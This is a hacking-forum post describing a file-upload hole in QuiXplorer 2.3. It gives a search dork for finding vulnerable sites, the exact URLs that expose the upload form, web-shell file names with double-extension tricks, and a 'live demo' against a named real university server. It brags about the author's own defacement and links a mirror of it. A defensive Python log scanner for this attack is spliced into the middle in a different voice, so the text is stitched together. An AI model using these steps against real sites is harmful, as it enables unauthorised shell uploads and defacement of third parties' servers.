
QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability Upload shell and deface easily

Open Google.com and type this dork:
intitle:"QuiXplorer 2.3 - the QuiX project"


You'll see a lot of sites; some big websites are vulnerable too, like the Harvard University website.
Select any website from the search results.
Vulnerability



http://[localhost]/[path]/index.php?action=list&order=name&srt=yes




http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
After going to this URL you will see a file manager.
You can upload your files here.


Find the edit file, create file, etc. icons on the page and click the last one; it is the upload option.







You can also upload directly by changing the URL: just put action=upload&order=name&srt=yes
after index.php?
Example:
http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
Shell example: shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or any supported file.
Click on your file to view it.
Live demo : 
http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/filestorage/  
I know some asshole will change the deface,
so here is the mirror of the defacement: http://attack-h.org/attack/?id=8452
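For defenders, the request pattern described above (the `action=upload` query on the file manager's `index.php`, followed by a fetch of a file with a script extension anywhere in its name) can be detected in web server access logs. This is an added example, not part of the original article; the log lines are constructed, and the `/filestorage/` prefix, extension list and function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined format) for illustration, not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [22/Feb/2012:10:01:02 +0000] "GET /files/index.php?action=list&order=name&srt=yes HTTP/1.1" 200 5120
198.51.100.7 - - [22/Feb/2012:10:01:40 +0000] "POST /files/index.php?action=upload&order=name&srt=yes HTTP/1.1" 200 812
198.51.100.7 - - [22/Feb/2012:10:02:05 +0000] "GET /filestorage/shell.php.jpg HTTP/1.1" 200 93
203.0.113.9 - - [22/Feb/2012:10:05:00 +0000] "GET /filestorage/photo.jpg HTTP/1.1" 200 20480
203.0.113.9 - - [22/Feb/2012:10:06:10 +0000] "GET /filestorage/notes.asp HTTP/1.1" 200 301
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
SCRIPT_EXTS = {"php", "php5", "phtml", "asp", "aspx", "jsp", "cgi", "pl"}
# Assumption: directory the file manager writes uploads into; adjust per site.
STORAGE_PREFIXES = ("/filestorage/",)


def script_ext_anywhere(path):
    """True if any extension in the file name is a script type (e.g. shell.php.jpg)."""
    name = path.rsplit("/", 1)[-1].lower()
    return any(part in SCRIPT_EXTS for part in name.split(".")[1:])


def scan(log_text):
    """Return (client_ip, rule, request_target) for each suspicious request."""
    findings, uploaders = [], set()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, target, status = m.groups()
        url = urlsplit(target)
        action = parse_qs(url.query).get("action", [""])[0]
        if url.path.endswith("/index.php") and action == "upload":
            if method == "POST" and status[0] in "23":
                uploaders.add(ip)  # remember who successfully posted an upload
                findings.append((ip, "upload-post", target))
            else:
                findings.append((ip, "upload-form-view", target))
        elif url.path.startswith(STORAGE_PREFIXES) and script_ext_anywhere(url.path):
            rule = "upload-then-script-fetch" if ip in uploaders else "script-name-in-storage"
            findings.append((ip, rule, target))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

A `script-name-in-storage` hit is worth reviewing even without a matching upload, since the upload may predate the log window being scanned.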



Category: Exploits and Vulnerabilities | Added by: 3x3r00t (12.02.22) | Author: 3X3.R()()T